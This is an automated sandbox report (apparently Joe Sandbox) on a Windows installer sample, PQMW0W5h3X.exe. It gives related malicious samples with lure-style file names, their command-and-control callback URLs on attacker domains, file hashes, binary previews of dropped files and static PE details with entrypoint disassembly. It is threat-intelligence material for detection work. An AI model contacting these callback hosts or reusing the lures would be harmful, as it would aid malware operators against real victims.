                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                • Not all processes where analyzed, report is missing behavior information

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                No simulations

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                213.186.33.5RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                                                • www.prltoday.com/uqf5/?9rTd=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580fE4Vra9h2o&aVz=WBZ8
                                                                                20210622-kll98374.exeGet hashmaliciousBrowse
                                                                                • www.impresafree24.com/nmda/?RP2h-fQ=IdLvG/bKy9PiMBchWzdVhP2W3XlWgHjHBI4V2wYIVZfP5YHWbmtjQK3eIV/cIXUoTbKn&5jo=7neT66GHcVrh
                                                                                New_PO#98202139.xllGet hashmaliciousBrowse
                                                                                • www.guniverse.net/wlns/?_8=obmV34E8IgJL0y0kI7hyDBOk8azyZSyy8uvUE6L1y0VpxoEYjAH5t6/TlTHDCRXI3f38&xDK=UZYPUlDPt4SDBZ8P
                                                                                kdhfue77324.exeGet hashmaliciousBrowse
                                                                                • www.poacolors.com/ngvm/?DT-D=8TcJTBzsK+HhuKYXehH9492pDxzGvvxdxfrG/qrl9m6Ckg/etRlY8SCi3gshhWGBB0c4&1bZXAr=h454ixkXP29
                                                                                FedEx doc 17062021.exeGet hashmaliciousBrowse
                                                                                • www.tcaproduct.ovh/ssh4/?2d34=SDKxiPv&h0DHzD=Rl/zsYIsdXtBwt3twxu2LuJTC0qMvDm4Mc/hvN4nDKVlMCw1vgexk8V+cx4orVYgW6Zi
                                                                                DocumentCopy_pdf.exeGet hashmaliciousBrowse
                                                                                • www.impresafree24.com/nmda/?V6y8=IdLvG/bKy9PiMBchWzdVhP2W3XlWgHjHBI4V2wYIVZfP5YHWbmtjQK3eIWTMUmITUuj2ckrA9g==&cT=4huTdrP0
                                                                                kkaH2ZEdQ1.exeGet hashmaliciousBrowse
                                                                                • www.lp-groupe.info/ybn/?-ZdTr=wOGr+F25RoP9WPNpsFGFxRGNLhzZTK4kudDetDHrkCGTjpx6UWpWoSIk1czumSYA4+qY&oRm8=s8YlDbK80xIp
                                                                                Shipping Doc578.exeGet hashmaliciousBrowse
                                                                                • www.geraldineprofit.com/ajsp/?hL0=mX3FC0rWOmZLwh4qbfvKXGX9RdF3hnuYXE+OWqE17ZQMzXMEP9+qCOq0VR7aaEzUGOwrMvYUag==&Dxl0dz=0txXARu8O6
                                                                                Reference No. # 3200025006.exeGet hashmaliciousBrowse
                                                                                • www.thetravelingplant.com/ntfs/?F48L2tc=r6KcxW+QOqJy23YP7pEknY9griH0XGsR7HWvbkIiP6j3PsQ8V0Yr7GW48LtU7Huq9clfVnYY1w==&2dWDG=6lX42hr8TrzLRjc
                                                                                Purchase_Order.exeGet hashmaliciousBrowse
                                                                                • www.prltoday.com/uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT
                                                                                Payment slip.exeGet hashmaliciousBrowse
                                                                                • www.lebigconcours.com/3edq/?2dUX-PAP=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAeo737h+ZhVc&D6Otan=1bu800r
                                                                                Shipping Draft Doc.exeGet hashmaliciousBrowse
                                                                                • www.geraldineprofit.com/ajsp/?m2MXt=mX3FC0rWOmZLwh4qbfvKXGX9RdF3hnuYXE+OWqE17ZQMzXMEP9+qCOq0VSXzZEPsPtF9&g6bX=7nfxC0PhW
                                                                                Payment_Advice.exeGet hashmaliciousBrowse
                                                                                • www.prltoday.com/uqf5/?9rw=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580fE4Vra9h2o&s6=bPYXfd3Xq0VHDp
                                                                                statement.exeGet hashmaliciousBrowse
                                                                                • www.economiemalin.com/s5cm/?jZVXl=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmewkBggS6qKyN&t6AdVb=NdfHc4_xG2JHQlV
                                                                                1092991(JB#082).exeGet hashmaliciousBrowse
                                                                                • www.lebigconcours.com/3edq/?JfEt9j6h=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAeo737h+ZhVc&ojn0d=RzuliD
                                                                                OUTSTANDING PAYMENT REMINDER.exeGet hashmaliciousBrowse
                                                                                • www.poacolors.com/ngvm/?FPWhHFq=8TcJTBzsK+HhuKYXehH9492pDxzGvvxdxfrG/qrl9m6Ckg/etRlY8SCi3gsL+m2BF2U4&Bj=lHL8SXfh3Ju
                                                                                ZEtvKwfrmf.exeGet hashmaliciousBrowse
                                                                                • www.hunab.tech/a8si/?ndiHKd=R2Mdy&Jdvd=faV7garRSu7JiSdjFrXmcIZZ3FAmdB/GT7EG2sZeIe9fZGAKSSr6iowPvTsgHFLaJTVrUqirQA==
                                                                                invoice.exeGet hashmaliciousBrowse
                                                                                • www.lebigconcours.com/3edq/?URZh=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAdIr4axGHE8b&jL30vv=afhhplx
                                                                                1bb71f86_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                • www.saveursdelaferme.com/njhr/?_89pb=6BYgV36frgEPm4Bks1lvfbqyImS2+mAjTc1MWw0zm1TdS4XMIGEQigd8Qb1RKTDe9sQA&FPWl=Cd8tG
                                                                                correct invoice.exeGet hashmaliciousBrowse
                                                                                • www.economiemalin.com/s5cm/?Zh3XHBo=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmezI7jh+Bp9TckTab0g==&Xv0Hzp=j0Dx
                                                                                172.67.129.330FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                                • www.builtbydawn.com/dy8g/?8pWL=Wlch&rVW8M4=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX
                                                                                orders.exeGet hashmaliciousBrowse
                                                                                • www.furlashop.site/ni6e/?W6=dhmVnxFiqqQHtzkp6eqPey57Y8PFMjt1OTneE2bUvMahMvc1ZtnhmpLaq/pNC70nk10eiFrAbg==&UlPt=GVoxsVvHVpd8Sl
                                                                                75.2.81.221Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                                • www.helpwithgre.com/fhg5/?idFt5Lt8=2UtB8DcbqqUNdGGafXCP7IZK2b+ICtd8++zQoCDv+Hjw8z9Bnq28qASc6PfUd7Mbl5s7loQVOw==&TZ=EjUt0xR

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                825610.parkingcrew.netShipping Documents C1216.exeGet hashmaliciousBrowse
                                                                                • 75.2.81.221
                                                                                47DOC008699383837383 PDF.exeGet hashmaliciousBrowse
                                                                                • 54.72.9.115
                                                                                29SCAN 0750.exeGet hashmaliciousBrowse
                                                                                • 54.72.9.115
                                                                                www.builtbydawn.com0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                                • 172.67.129.33

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                EGIHOSTINGUSkXkTaGocR5.exeGet hashmaliciousBrowse
                                                                                • 142.111.47.2
                                                                                New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                                                • 107.186.80.254
                                                                                Swift advice Receipt.exeGet hashmaliciousBrowse
                                                                                • 107.187.208.22
                                                                                Nuvoco_RFQ_21-06-2021.exeGet hashmaliciousBrowse
                                                                                • 104.164.227.199
                                                                                Statement for MCF and SSL890935672002937383920028202.exeGet hashmaliciousBrowse
                                                                                • 45.39.168.175
                                                                                Purchase Order No. 7406595 .xlsxGet hashmaliciousBrowse
                                                                                • 142.111.47.2
                                                                                INVOICE E-4137 REV.1 AND E-4136 REV.1.exeGet hashmaliciousBrowse
                                                                                • 172.252.104.51
                                                                                Payment copy_MT103_9847.exeGet hashmaliciousBrowse
                                                                                • 104.252.33.45
                                                                                #10923.exeGet hashmaliciousBrowse
                                                                                • 45.39.170.172
                                                                                Enquiry (OUR REF #162620321) (OUR REF # 166060421) Taylor Marine Project.exeGet hashmaliciousBrowse
                                                                                • 23.230.206.228
                                                                                1itFWK1W1z.exeGet hashmaliciousBrowse
                                                                                • 104.252.121.237
                                                                                JUN14 OUTSTANDING CONTRACT ORDER-01.xlsxGet hashmaliciousBrowse
                                                                                • 104.252.121.237
                                                                                succ.exeGet hashmaliciousBrowse
                                                                                • 142.111.45.198
                                                                                UOMp9cDcqZ.exeGet hashmaliciousBrowse
                                                                                • 142.111.47.2
                                                                                DNPr7t0GMY.exeGet hashmaliciousBrowse
                                                                                • 142.111.47.2
                                                                                Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                • 142.111.47.2
                                                                                lLJGwAgWDh.exeGet hashmaliciousBrowse
                                                                                • 104.252.75.149
                                                                                Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                                • 104.164.109.43
                                                                                tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                                • 142.111.47.2
                                                                                RFQ.exeGet hashmaliciousBrowse
                                                                                • 136.0.84.126
                                                                                OVHFRRFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                                                • 213.186.33.5
                                                                                20210622-kll98374.exeGet hashmaliciousBrowse
                                                                                • 213.186.33.5
                                                                                New_PO#98202139.xllGet hashmaliciousBrowse
                                                                                • 213.186.33.5
                                                                                Aramco Urgent Inquiry.exeGet hashmaliciousBrowse
                                                                                • 158.69.138.23
                                                                                o7w2HSi17V.exeGet hashmaliciousBrowse
                                                                                • 151.80.212.114
                                                                                KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                                • 149.202.90.163
                                                                                KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                                • 149.202.90.163
                                                                                KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                                • 149.202.90.163
                                                                                New Order Quotation.exeGet hashmaliciousBrowse
                                                                                • 91.121.250.242
                                                                                kdhfue77324.exeGet hashmaliciousBrowse
                                                                                • 213.186.33.5
                                                                                Purchase_Order.exeGet hashmaliciousBrowse
                                                                                • 51.195.43.214
                                                                                v6OezjZIJXGet hashmaliciousBrowse
                                                                                • 176.31.225.204
                                                                                INVOICE-CVE-0814.docGet hashmaliciousBrowse
                                                                                • 188.165.215.31
                                                                                New Order - unitednature- 34526745727_PDF.exeGet hashmaliciousBrowse
                                                                                • 158.69.185.137
                                                                                butkoin-android.apkGet hashmaliciousBrowse
                                                                                • 51.161.32.104
                                                                                butkoin-android.apkGet hashmaliciousBrowse
                                                                                • 51.161.32.104
                                                                                ProstoLauncher.exeGet hashmaliciousBrowse
                                                                                • 51.91.79.48
                                                                                qH2tfmLbBO433it.exeGet hashmaliciousBrowse
                                                                                • 54.36.120.230
                                                                                8qVvWJZa2l.exeGet hashmaliciousBrowse
                                                                                • 51.195.61.169
                                                                                n5X8VTnH3C.exeGet hashmaliciousBrowse
                                                                                • 51.195.61.169
                                                                                CLOUDFLARENETUSOrder.exeGet hashmaliciousBrowse
                                                                                • 23.227.38.74
                                                                                0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                                • 104.21.86.209
                                                                                ZLT4uMbNxX.exeGet hashmaliciousBrowse
                                                                                • 172.67.158.27
                                                                                Payment Ref 24,845.docxGet hashmaliciousBrowse
                                                                                • 172.67.150.133
                                                                                #U00f0#U0178#U2022#U00bb Missed Call Playback Recording.wav%20%20-%20%2B1%208459838811.htmGet hashmaliciousBrowse
                                                                                • 104.16.18.94
                                                                                Payment Ref 24,845.docxGet hashmaliciousBrowse
                                                                                • 104.21.30.38
                                                                                Halkbank_Ekstre_20210622_142426_2309801.doc.exeGet hashmaliciousBrowse
                                                                                • 172.67.188.154
                                                                                DLJxQ5rIop.exeGet hashmaliciousBrowse
                                                                                • 104.21.14.60
                                                                                Ejima.exeGet hashmaliciousBrowse
                                                                                • 23.227.38.74
                                                                                kXkTaGocR5.exeGet hashmaliciousBrowse
                                                                                • 104.16.12.194
                                                                                y7jLZLDw1K.exeGet hashmaliciousBrowse
                                                                                • 172.67.154.116
                                                                                heoN5wnP2d.exeGet hashmaliciousBrowse
                                                                                • 23.227.38.74
                                                                                y7jLZLDw1K.exeGet hashmaliciousBrowse
                                                                                • 104.21.5.100
                                                                                DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                • 23.227.38.74
                                                                                PwBsqWQ7jJ.exeGet hashmaliciousBrowse
                                                                                • 104.23.99.190
                                                                                MLO.exeGet hashmaliciousBrowse
                                                                                • 172.67.158.27
                                                                                RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                                                • 104.21.64.212
                                                                                New_PO#98202139.xllGet hashmaliciousBrowse
                                                                                • 104.21.63.141
                                                                                Invoice.exeGet hashmaliciousBrowse
                                                                                • 104.21.19.200
                                                                                xuYHNpNA7N.exeGet hashmaliciousBrowse
                                                                                • 104.21.14.60

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dllNew Order.exeGet hashmaliciousBrowse
                                                                                  hesaphareketi-0.exeGet hashmaliciousBrowse
                                                                                    0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                                      mlzHNUHkUl.exeGet hashmaliciousBrowse
                                                                                        Ejima.exeGet hashmaliciousBrowse
                                                                                          UrgentNewOrder_pdf.exeGet hashmaliciousBrowse
                                                                                            Swift 001.exeGet hashmaliciousBrowse
                                                                                              DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                DHL Shipment Documents.exeGet hashmaliciousBrowse
                                                                                                  20210622-kll98374.exeGet hashmaliciousBrowse
                                                                                                    SKMTC_STOMANAS_7464734648592848Ordengdoc.exeGet hashmaliciousBrowse
                                                                                                      Orden de compra.exeGet hashmaliciousBrowse
                                                                                                        Pending delivery - Final Attempt.exeGet hashmaliciousBrowse
                                                                                                          2bni49vTpt.exeGet hashmaliciousBrowse
                                                                                                            rJIeeo2B7Q.exeGet hashmaliciousBrowse
                                                                                                              e-hesap bildirimi.exeGet hashmaliciousBrowse
                                                                                                                Draft Booking Confirmation 062120297466471346.exeGet hashmaliciousBrowse
                                                                                                                  HalkbankEkstre0609202138711233847204.exeGet hashmaliciousBrowse
                                                                                                                    232.exeGet hashmaliciousBrowse
                                                                                                                      Yeni Siparis.exeGet hashmaliciousBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Temp\39fgrq8knozigd2
                                                                                                                        Process:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):164863
                                                                                                                        Entropy (8bit):7.987160505943616
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:b8jI9IpDIpzoIP+Fse43/wFMFGtz1LWNqehEAll3N/xB87W79q+ErdSLtiT77M+:IjGI9kzmFZ24V1Sbeo9P87otE4In7M+
                                                                                                                        MD5:6C05E9CA19C49E1B760DBF27E1B1D1AC
                                                                                                                        SHA1:555A897815D912EA8E2F745B34B596A5487DA6C1
                                                                                                                        SHA-256:8D1046B1444E99B9BDEAEA15C07F29E894FF13DD4B3584844DACD8CF8E2BDA9E
                                                                                                                        SHA-512:7869728E06C25F4D84473E2E4A2BC4DEBC7C3C773D26AB0D987243994C51AC07C2829F6414160DF0A194E93820C3AC52CFCFE6248AC81751921EC773710471B6
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: h......fe..Q.D.V...8.lt`.%._..Q....mVG............6.o....B........^..E....W...=Bl....S1.u.2.a.P..Nf&.s.Q..8..|[...B.#...5.. f;...).......W..!t ^9.VN.TA..G-...].....N....0x....oP.W.7.R.c.llf.|tv.I.5.1<&..4|7P.Dx.d.r$3....p|.w..R`2DBz.....N.s.8.......fe.T.q....Nr..........Q....m7G.....Y......6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..9R2.......@......l.f.|tv.4...$f<.(...7P.Dx.d..J....@..w..R`FDBz.......s.8......fe1..q....Nr..../..[..'.Q....mVG............6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..0x...x.P..D....n.llf.|tv.4...$f<...|7P.Dx.d..J....@..w..R`FDBz.......s.8......fe1..q....Nr..../..[..'.Q....mVG............6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..0x...x.P..D....n.llf.|tv.4...$f<...|7P.Dx.d..J....
                                                                                                                        C:\Users\user\AppData\Local\Temp\axjnwhbrvqsxuek
                                                                                                                        Process:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        File Type:DOS executable (COM)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):58134
                                                                                                                        Entropy (8bit):5.253844260673871
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:IMtQIDSwNLs8vRjAU+YqXFCeI3SoKZshe9uB:IMtQIDSwNL7ZjwV4eI3LKZ2B
                                                                                                                        MD5:D5C9184EC17F0CE4778AB93D418EFB6B
                                                                                                                        SHA1:FA5B4C0A266AE61855B671E50BBF23E8EF5D246E
                                                                                                                        SHA-256:A8863C2A1805C6E00A88A319BEEAE073336708F861D07986D8DF38B593EF5B0E
                                                                                                                        SHA-512:F9042310DA98088500A9730CD2BFA76FDF4835AF33B8BE9C0BA3A11E67F6DC56661E0AB92425658D1F91FDA7BAB964D134595748C7C3E1EB1EE174963FC1158E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: .....U..x........S..........e...............E.;.E.-.E...E.r.E.s.e..PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5......X[PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5...
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll
                                                                                                                        Process:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):10752
                                                                                                                        Entropy (8bit):5.7425597599083344
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:uv+cJZE61KRWJQO6tFiUdK7ckK4k7l1XRBm0w+NiHi1GSJ:uf6rtFRduQ1W+fG8
                                                                                                                        MD5:56A321BD011112EC5D8A32B2F6FD3231
                                                                                                                        SHA1:DF20E3A35A1636DE64DF5290AE5E4E7572447F78
                                                                                                                        SHA-256:BB6DF93369B498EAA638B0BCDC4BB89F45E9B02CA12D28BCEDF4629EA7F5E0F1
                                                                                                                        SHA-512:5354890CBC53CE51081A78C64BA9C4C8C4DC9E01141798C1E916E19C5776DAC7C82989FAD0F08C73E81AABA332DAD81205F90D0663119AF45550B97B338B9CC3
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                        • Filename: hesaphareketi-0.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 0FKzNO1g3P.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mlzHNUHkUl.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Ejima.exe, Detection: malicious, Browse
                                                                                                                        • Filename: UrgentNewOrder_pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Swift 001.exe, Detection: malicious, Browse
                                                                                                                        • Filename: DHL DOCUMENTS.exe, Detection: malicious, Browse
                                                                                                                        • Filename: DHL Shipment Documents.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 20210622-kll98374.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SKMTC_STOMANAS_7464734648592848Ordengdoc.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Pending delivery - Final Attempt.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 2bni49vTpt.exe, Detection: malicious, Browse
                                                                                                                        • Filename: rJIeeo2B7Q.exe, Detection: malicious, Browse
                                                                                                                        • Filename: e-hesap bildirimi.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Draft Booking Confirmation 062120297466471346.exe, Detection: malicious, Browse
                                                                                                                        • Filename: HalkbankEkstre0609202138711233847204.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 232.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Yeni Siparis.exe, Detection: malicious, Browse
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L...X:.V...........!.................).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text............................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.8818598681550505
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:PQMW0W5h3X.exe
                                                                                                                        File size:205167
                                                                                                                        MD5:6b26db585f40e14b00b5adda57e595dd
                                                                                                                        SHA1:ffbb4390c5cdb9d0aa78061399f5a9993a955dd3
                                                                                                                        SHA256:8b39bf75ce8ca2ecadafeb01a2ff33fc07419198e5b222bf20385ecbf2da0ff4
                                                                                                                        SHA512:c26411bdcd24c4c8a403f0f976b1a7bcb9cad433da9a48e7b4cb4297db3a8f11ec929444a63fc3529c634bdb549704addfa7ef04f6b6130abbf03348ce92d8ba
                                                                                                                        SSDEEP:3072:ABynOpL12rioc6MspGSA6DPJdXBH79/el5iVnLBMpBVeyb4+NVLhSkodlMxcGUHf:ABlL/bssSTPvXBwIGpBbUe/odlVDVBX
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                                                                                        File Icon

                                                                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x4030fb
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 00000184h
                                                                                                                        push ebx
                                                                                                                        push ebp
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                        mov dword ptr [esp+14h], 00409168h
                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                        mov byte ptr [esp+18h], 00000020h
                                                                                                                        call dword ptr [004070B0h]
                                                                                                                        call dword ptr [004070ACh]
                                                                                                                        cmp ax, 00000006h
                                                                                                                        je 00007F7734B820B3h
                                                                                                                        push ebx
                                                                                                                        call 00007F7734B84E94h
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F7734B820A9h
                                                                                                                        push 00000C00h
                                                                                                                        call eax
                                                                                                                        mov esi, 00407280h
                                                                                                                        push esi
                                                                                                                        call 00007F7734B84E10h
                                                                                                                        push esi
                                                                                                                        call dword ptr [00407108h]
                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                        jne 00007F7734B8208Dh
                                                                                                                        push 0000000Dh
                                                                                                                        call 00007F7734B84E68h
                                                                                                                        push 0000000Bh
                                                                                                                        call 00007F7734B84E61h
                                                                                                                        mov dword ptr [00423F44h], eax
                                                                                                                        call dword ptr [00407038h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [0040726Ch]
                                                                                                                        mov dword ptr [00423FF8h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 0041F4F0h
                                                                                                                        call dword ptr [0040715Ch]
                                                                                                                        push 0040915Ch
                                                                                                                        push 00423740h
                                                                                                                        call 00007F7734B84A94h
                                                                                                                        call dword ptr [0040710Ch]
                                                                                                                        mov ebp, 0042A000h
                                                                                                                        push eax
                                                                                                                        push ebp
                                                                                                                        call 00007F7734B84A82h
                                                                                                                        push ebx
                                                                                                                        call dword ptr [00407144h]

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xc80.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
